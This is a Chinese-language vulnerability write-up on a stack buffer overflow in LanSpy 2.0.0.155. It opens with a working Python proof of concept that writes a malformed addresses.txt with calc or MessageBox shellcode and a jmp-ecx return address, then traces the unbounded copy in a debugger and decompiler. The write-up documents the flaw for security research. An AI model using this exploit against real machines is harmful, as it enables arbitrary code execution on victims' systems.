LanSpy 2.0.0.155本地代码执行漏洞

作者:k0shl 转载请注明出处:https://whereisk0shl.top


漏洞说明


LanSpy是一款黑客IP扫描工具,在LanSpy打开时会加载Address.txt文件中的地址,随后进行处理,但是在处理的时候没有对Address的有效性和长度进行控制,从而如果通过构造特殊的Address文件,在加载的时候加载畸形的字符串传入,会导致栈溢出,从而导致任意代码执行。

软件下载:
https://www.exploit-db.com/apps/42114d0f9e88ad76acaa0f145dabf923-lanspy_setup.exe

PoC:

import struct

# 32bit Alphanum-ish shellcodes
# Bad chars detected: 00 2d 20

# MessageBoxA at => 00404D80
msgbox_shellcode = (
        "\x31\xC0\x50\x68"
        "\x70\x77\x6E\x64"
        "\x54\x5F\x50\x57"
        "\x57\x50\x35\xC4"
        "\x80\x80\x55\x35"
        "\x44\xCD\xC0\x55"
        "\x50\xC3"
        )

# WinExec at -> 004EC4FF
calc_shellcode = (
        "\x31\xC0\x50\x68"
        "\x63\x61\x6C\x63"
        "\x54\x5F\x50\x57"
        "\x35\xC3\x4E\xC3"
        "\x55\x35\x3C\x8A"
        "\x8D\x55\x50\xC3"
        )

# Change the shellcode to be used here
scde = calc_shellcode
#scde = msgbox_shellcode

# 126 are the bytes to jmp back with opcode \x74\x80 => ja -80h and it is where our shellcode resides
junk = 'A'*(676-126) 
if len(scde) > 126:
    exit("[e] Shellcode is too big! Egghunter maybe? ;)")

# 0040407D => jmp ecx inside LanSpy
jecx = 'A'*(126-len(scde))+'\x74\x80CC'+struct.pack('<I', 0x0040407D)

# Junk + Shellcode for calc + jump to our first stage jump which jumps to the second stage calc shellcode
payl = junk + scde + jecx

with open("addresses.txt", "wb") as f:
        f.write(payl)
        f.close()

漏洞触发需要运行PoC后生成一个address文件,然后替换lanspy本身的之后打开触发。


漏洞分析


首先构造一个畸形的Address.txt进行替换,然后打开LanSpy,这时候Address畸形字符串会在LanSpy启动的时候直接被加载,直接运行LanSpy扫描,程序崩溃。

(138.140): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=01e4fc41 ebx=00418d7c ecx=01e4feb0 edx=00000000 esi=00410041 edi=00410041
eip=41414141 esp=01e4feb8 ebp=41414141 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
41414141 ??              ???

此时eip已经到了可控位置,通过kb查看一下堆栈回溯。

0:004> kb
ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
01e4feb4 41414141 41414141 41414141 41414141 0x41414141
*** WARNING: Unable to verify checksum for C:\Program Files\LanTricks\LanSpy\LanSpy.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\LanTricks\LanSpy\LanSpy.exe
01e4ffa0 00404eb6 01e4ffdc 004049e8 01e4ffb4 0x41414141
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll - 
01e4ffb4 7c80b713 00b4d2c0 00410041 00410041 LanSpy+0x4eb6
01e4ffec 00000000 00404e8c 00b4d2c0 00000000 kernel32!GetModuleFileNameA+0x1b4

跟踪到00404eb6位置,这里是一处函数调用StartAddress,用于启动地址扫描功能的进程。

int __stdcall StartAddress(LPVOID lpThreadParameter)
{
  int (*v1)(void); // ST00_4@1
  int result; // eax@1
  unsigned int v3; // [sp-Ch] [bp-Ch]@1
  int (*v4)(); // [sp-8h] [bp-8h]@1
  int *v5; // [sp-4h] [bp-4h]@1
  int savedregs; // [sp+0h] [bp+0h]@1

  sub_403F10();
  v5 = &savedregs;
  v4 = sub_4049E8;
  v3 = __readfsdword(0);
  __writefsdword(0, (unsigned int)&v3);
  sub_402B5C(*(_DWORD *)lpThreadParameter, *((_DWORD *)lpThreadParameter + 1));
  result = v1();
  __writefsdword(0, v3);
  return result;
}

resutl会调用v1,v1的值是一处类似于虚函数的调用,实际上是动态取值的,直接跟踪。

0:004> g
Breakpoint 0 hit
eax=00000000 ebx=00b4d2c0 ecx=01e4ff90 edx=004fa5cc esi=00410041 edi=00410041
eip=00404eb2 esp=01e4ffa0 ebp=01e4ffb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0x4eb2:
00404eb2 5a              pop     edx
0:004> p
eax=00000000 ebx=00b4d2c0 ecx=01e4ff90 edx=004245fc esi=00410041 edi=00410041
eip=00404eb3 esp=01e4ffa4 ebp=01e4ffb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0x4eb3:
00404eb3 58              pop     eax
0:004> p
eax=00b6ad18 ebx=00b4d2c0 ecx=01e4ff90 edx=004245fc esi=00410041 edi=00410041
eip=00404eb4 esp=01e4ffa8 ebp=01e4ffb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0x4eb4:
00404eb4 ffd2            call    edx {LanSpy+0x245fc (004245fc)}

调用了004245fc位置的函数,跟进去。

void __usercall __noreturn sub_4245FC(int a1@<eax>)
{
  char v1; // bl@3
  int v2; // esi@3
  unsigned int v3; // [sp-18h] [bp-28h]@2
  void *v4; // [sp-14h] [bp-24h]@2
  int *v5; // [sp-10h] [bp-20h]@2
  unsigned int v6; // [sp-Ch] [bp-1Ch]@1
  void *v7; // [sp-8h] [bp-18h]@1
  int (*v8)(); // [sp-4h] [bp-14h]@1
  _DWORD *v9; // [sp+Ch] [bp-4h]@1
  int savedregs; // [sp+10h] [bp+0h]@1

  v9 = (_DWORD *)a1;
  v8 = (int (*)())&savedregs;
  v7 = &sub_424692;
  v6 = __readfsdword(0);
  __writefsdword(0, (unsigned int)&v6);
  if ( !*(_BYTE *)(a1 + 13) )
  {
    v5 = &savedregs;
    v4 = &loc_42463D;
    v3 = __readfsdword(0);
    __writefsdword(0, (unsigned int)&v3);
    (*(void (**)(void))(*v9 + 4))();

这个函数到后面会调用v9偏移为4的函数,v9取决于a1,可以发现a1应该是一个结构体指针,因为之前会对a1+13位置的变量值进行一个if判断,随后又调用a1偏移为4的函数。

0:004> p
eax=00000000 ebx=00b4d2c0 ecx=01e5ff90 edx=004245fc esi=00410041 edi=00410041
eip=0042462b esp=01e5ff78 ebp=01e5ffa0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0x2462b:
0042462b 8b45fc          mov     eax,dword ptr [ebp-4] ss:0023:01e5ff9c=00b6ad18
0:004> p
eax=00b6ad18 ebx=00b4d2c0 ecx=01e5ff90 edx=004245fc esi=00410041 edi=00410041
eip=0042462e esp=01e5ff78 ebp=01e5ffa0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0x2462e:
0042462e 8b10            mov     edx,dword ptr [eax]  ds:0023:00b6ad18=004ec838
0:004> p
eax=00b6ad18 ebx=00b4d2c0 ecx=01e5ff90 edx=004ec838 esi=00410041 edi=00410041
eip=00424630 esp=01e5ff78 ebp=01e5ffa0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0x24630:
00424630 ff5204          call    dword ptr [edx+4]    ds:0023:004ec83c=004ed9b0

这里调用的是004ed9b0函数,这个函数主要是负责处理扫描后的工作,包括在GUI界面中打印扫描信息等内容,动态跟踪这个函数,首先会有一处对于Address.txt传入内容的值的长度判断。

0:004> p
eax=00b7400c ebx=00418d7c ecx=00000002 edx=004edda4 esi=00410041 edi=00410041
eip=004edb30 esp=01e5fef8 ebp=01e5ff70 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
LanSpy+0xedb30:
004edb30 e893d9f4ff      call    LanSpy+0x3b4c8 (0043b4c8)

0:004> dd eax
00b7400c  41414141 41414141 41414141 41414141
00b7401c  41414141 41414141 41414141 41414141
00b7402c  41414141 41414141 41414141 41414141
00b7403c  41414141 41414141 41414141 41414141
00b7404c  41414141 41414141 41414141 41414141
00b7405c  41414141 41414141 41414141 41414141
00b7406c  41414141 41414141 41414141 41414141
00b7407c  41414141 41414141 41414141 41414141

bool __usercall sub_43B4C8@<al>(int a1@<eax>, int a2@<ecx>, char *a3@<edx>)
{
  return sub_40E290((void *)a2, a3, (char *)a1) > 0;
}

接下来一处函数调用处理IP地址信息,IDA没法变成伪代码,函数处理比较复杂,多数都是逻辑判断跳转。

0:004> p
eax=00000000 ebx=00418d7c ecx=01e5fee4 edx=004fa5cc esi=00410041 edi=00410041
eip=004edcab esp=01e5fef8 ebp=01e5ff70 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xedcab:
004edcab 8b55f8          mov     edx,dword ptr [ebp-8] ss:0023:01e5ff68=00000001
0:004> p
eax=00000000 ebx=00418d7c ecx=01e5fee4 edx=00000001 esi=00410041 edi=00410041
eip=004edcae esp=01e5fef8 ebp=01e5ff70 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xedcae:
004edcae 8b45fc          mov     eax,dword ptr [ebp-4] ss:0023:01e5ff6c=00b6ad18
0:004> p
eax=00b6ad18 ebx=00418d7c ecx=01e5fee4 edx=00000001 esi=00410041 edi=00410041
eip=004edcb1 esp=01e5fef8 ebp=01e5ff70 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xedcb1:
004edcb1 e8fe000000      call    LanSpy+0xeddb4 (004eddb4)

接下来会进行一系列操作,目的是获取Address.txt中的IP地址内容,然后调用inetaddr转换

0:004> p
eax=00000000 ebx=00418d7c ecx=01e5fee4 edx=004fa5cc esi=00410041 edi=00410041
eip=004edcab esp=01e5fef8 ebp=01e5ff70 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xedcab:
004edcab 8b55f8          mov     edx,dword ptr [ebp-8] ss:0023:01e5ff68=00000001
0:004> p
eax=00000000 ebx=00418d7c ecx=01e5fee4 edx=00000001 esi=00410041 edi=00410041
eip=004edcae esp=01e5fef8 ebp=01e5ff70 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xedcae:
004edcae 8b45fc          mov     eax,dword ptr [ebp-4] ss:0023:01e5ff6c=00b6ad18
0:004> p
eax=00b6ad18 ebx=00418d7c ecx=01e5fee4 edx=00000001 esi=00410041 edi=00410041
eip=004edcb1 esp=01e5fef8 ebp=01e5ff70 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xedcb1:
004edcb1 e8fe000000      call    LanSpy+0xeddb4 (004eddb4)

CODE:004EDE93                 push    eax             ; cp
CODE:004EDE94                 call    inet_addr

然后会进行一处跳转,跳转到另一个loc中

mov     eax, [ebp+var_4]
mov     edx, [eax+0C4h]
mov     eax, [ebp+var_4]
call    sub_4ED04C

这里会执行一揽子操作,然后调用函数sub_4ED04C,函数先进行两个参数的赋值过程,edx是畸形字符串的指针

0:004> p
eax=00b6ad18 ebx=00418d7c ecx=00000000 edx=00b7400c esi=00410041 edi=00410041
eip=004ed05d esp=01e4fbe8 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed05d:
004ed05d 8955f8          mov     dword ptr [ebp-8],edx ss:0023:01e4fea8=ffffffff
0:004> p
eax=00b6ad18 ebx=00418d7c ecx=00000000 edx=00b7400c esi=00410041 edi=00410041
eip=004ed060 esp=01e4fbe8 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed060:
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\WS2_32.dll - 
004ed060 8945fc          mov     dword ptr [ebp-4],eax ss:0023:01e4feac=71a22f3c
0:004> dd edx
00b7400c  41414141 41414141 41414141 41414141
00b7401c  41414141 41414141 41414141 41414141
00b7402c  41414141 41414141 41414141 41414141
00b7403c  41414141 41414141 41414141 41414141
00b7404c  41414141 41414141 41414141 41414141
00b7405c  41414141 41414141 41414141 41414141

然后进行WSA的初始化,要开始创建socket套接字

CODE:004ED065                 push    ebp
CODE:004ED066                 push    offset loc_4ED1AB
CODE:004ED06B                 push    dword ptr fs:[eax]
CODE:004ED06E                 mov     fs:[eax], esp
CODE:004ED071                 lea     eax, [ebp+WSAData]
CODE:004ED077                 push    eax             ; lpWSAData
CODE:004ED078                 push    101h            ; wVersionRequested
CODE:004ED07D                 call    WSAStartup

接下来会调用到一个函数sub_40a3a4,这个过程会把畸形字符串的指针传给name参数,随后在4ed0b3位置调用gethostbyname获取IP地址基本信息,eax是name指针,此时已经被畸形字符串覆盖,问题就出在这里,sub0040a3a4

0:004> p
eax=01e4fc0c ebx=00418d7c ecx=71a26b63 edx=71a34098 esi=00410041 edi=00410041
eip=004ed0a4 esp=01e4fbd0 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed0a4:
004ed0a4 8b55f8          mov     edx,dword ptr [ebp-8] ss:0023:01e4fea8=00b7400c
0:004> p
eax=01e4fc0c ebx=00418d7c ecx=71a26b63 edx=00b7400c esi=00410041 edi=00410041
eip=004ed0a7 esp=01e4fbd0 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed0a7:
004ed0a7 e8f8d2f1ff      call    LanSpy+0xa3a4 (0040a3a4)
0:004> p
eax=01e4fc0c ebx=00418d7c ecx=00000000 edx=01e4fc0c esi=00410041 edi=00410041
eip=004ed0ac esp=01e4fbd0 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed0ac:
004ed0ac 8d855cfdffff    lea     eax,[ebp-2A4h]
0:004> p
eax=01e4fc0c ebx=00418d7c ecx=00000000 edx=01e4fc0c esi=00410041 edi=00410041
eip=004ed0b2 esp=01e4fbd0 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed0b2:
004ed0b2 50              push    eax
0:004> p
eax=01e4fc0c ebx=00418d7c ecx=00000000 edx=01e4fc0c esi=00410041 edi=00410041
eip=004ed0b3 esp=01e4fbcc ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed0b3:
004ed0b3 e810a5faff      call    LanSpy+0x975c8 (004975c8)  gethostbyname
0:004> dd eax
01e4fc0c  41414141 41414141 41414141 41414141
01e4fc1c  41414141 41414141 41414141 41414141
01e4fc2c  41414141 41414141 41414141 41414141
01e4fc3c  41414141 41414141 41414141 41414141
01e4fc4c  41414141 41414141 41414141 41414141
01e4fc5c  41414141 41414141 41414141 41414141

仔细看一下这个函数

int __fastcall sub_40A3A4(int a1, char *a2)
{
  char *v2; // ebx@1
  int v3; // ST00_4@1
  char *v4; // eax@1

  v2 = a2;
  v3 = sub_4051EC(a1);
  v4 = sub_4053EC(v2);
  return sub_40A370(v3, v4);
}

a2是畸形字符串指针,在return的时候会调用sub_40a370函数,这个函数会执行memcpy操作进行拷贝,但没有进行长度控制

_BYTE *__usercall sub_40A370@<eax>(_BYTE *result@<eax>, _BYTE *a2@<edx>, int a3@<ecx>)
{
  _BYTE *v3; // edi@1
  int v4; // ebx@1
  bool v5; // zf@1
  unsigned int v6; // ebx@6
  char *v7; // edi@6
  int v8; // ecx@6

  v3 = a2;
  v4 = a3;
  v5 = a3 == 0;
  if ( a3 )
  {
    do
    {
      if ( !a3 )
        break;
      v5 = *v3++ == 0;
      --a3;
    }
    while ( !v5 );
    if ( v5 )
      ++a3;
  }
  v6 = v4 - a3;
  qmemcpy(result, a2, 4 * (v6 >> 2));
  v7 = &result[4 * (v6 >> 2)];
  v8 = v6 & 3;
  qmemcpy(v7, &a2[4 * (v6 >> 2)], v8);
  v7[v8] = 0;
  return result;
}

观察这个过程,拷贝结束后,已经将畸形字符串铐到栈中。

0:004> p
eax=01e4fc0c ebx=00b7400c ecx=00000384 edx=00b7400c esi=01e4fc0c edi=00410041
eip=0040a3bf esp=01e4fbc0 ebp=01e4feb0 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
LanSpy+0xa3bf:
0040a3bf e8acffffff      call    LanSpy+0xa370 (0040a370)
0:004> dc esi
01e4fc0c  7ffde000 00000018 7c92118a 00500010  ...........|..P.
01e4fc1c  00000002 01e4fc04 7ffde000 01e4fc94  ................
01e4fc2c  7c92e900 7c9485b0 7ffd9000 01e4fca4  ...|...|........
01e4fc3c  7c955df4 01e4fc68 7c93b197 7ffd9000  .].|h......|....
01e4fc4c  7ffde000 00000000 00000014 00000001  ................
01e4fc5c  00000000 00000000 00000010 00000014  ................
01e4fc6c  00000001 00000000 00000000 00000010  ................
01e4fc7c  7ffd9000 7ffde000 5dd6c1d5 00251ea4  ...........]..%.
0:004> p
eax=01e4fc0c ebx=00b7400c ecx=00000000 edx=01e4fc0c esi=01e4fc0c edi=00410041
eip=0040a3c4 esp=01e4fbc0 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xa3c4:
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\WS2_32.dll - 
0040a3c4 890424          mov     dword ptr [esp],eax  ss:0023:01e4fbc0=71a26b63
0:004> dc esi
01e4fc0c  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01e4fc1c  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01e4fc2c  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01e4fc3c  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01e4fc4c  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01e4fc5c  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01e4fc6c  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01e4fc7c  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA

随后返回后,当然这个过程肯定是失败的,会进入错误处理分支

0:004> p
eax=00000000 ebx=00418d7c ecx=00007a23 edx=00100001 esi=00410041 edi=00410041
eip=004ed0bf esp=01e4fbd0 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed0bf:
004ed0bf 0f84b3000000    je      LanSpy+0xed178 (004ed178)               [br=1]
0:004> p
eax=00000000 ebx=00418d7c ecx=00007a23 edx=00100001 esi=00410041 edi=00410041
eip=004ed178 esp=01e4fbd0 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed178:
004ed178 33c0            xor     eax,eax

程序返回时会由于之前的向栈中memcpy的操作拷贝,导致返回地址被覆盖。任意代码执行。这个分支处理会先调用WSAClear关闭WSA套接字初始化的句柄,然后会执行到函数返回,在这个过程中还会进行一次调用。

0:004> p
eax=01e4fc41 ebx=00418d7c ecx=01e4feb0 edx=00000000 esi=00410041 edi=00410041
eip=004ed1b5 esp=01e4fbe8 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed1b5:
004ed1b5 8be5            mov     esp,ebp
0:004> p
eax=01e4fc41 ebx=00418d7c ecx=01e4feb0 edx=00000000 esi=00410041 edi=00410041
eip=004ed1b7 esp=01e4feb0 ebp=01e4feb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed1b7:
004ed1b7 5d              pop     ebp
0:004> p
eax=01e4fc41 ebx=00418d7c ecx=01e4feb0 edx=00000000 esi=00410041 edi=00410041
eip=004ed1b8 esp=01e4feb4 ebp=41414141 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
LanSpy+0xed1b8:
004ed1b8 c3              ret
0:004> dd esp
01e4feb4  41414141 41414141 41414141 41414141
01e4fec4  41414141 41414141 41414141 41414141
01e4fed4  41414141 41414141 41414141 41414141
01e4fee4  41414141 41414141 41414141 41414141
01e4fef4  41414141 41414141 41414141 41414141
Comments
Write a Comment